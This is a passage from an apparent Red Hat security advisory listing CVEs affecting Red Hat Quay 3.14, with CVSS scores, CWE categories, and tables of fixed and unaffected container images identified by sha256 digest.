Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-32282

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-32286

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1285 - Improper Validation of Specified Index, Position, or Offset in Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Important

CVE-2026-32589

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L

CWE-639 - Authorization Bypass Through User-Controlled Key

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Important

CVE-2026-32590

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CWE-502 - Deserialization of Untrusted Data

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Moderate

CVE-2026-33186

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-551 - Incorrect Behavior Order: Authorization Before Parsing and Canonicalization

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
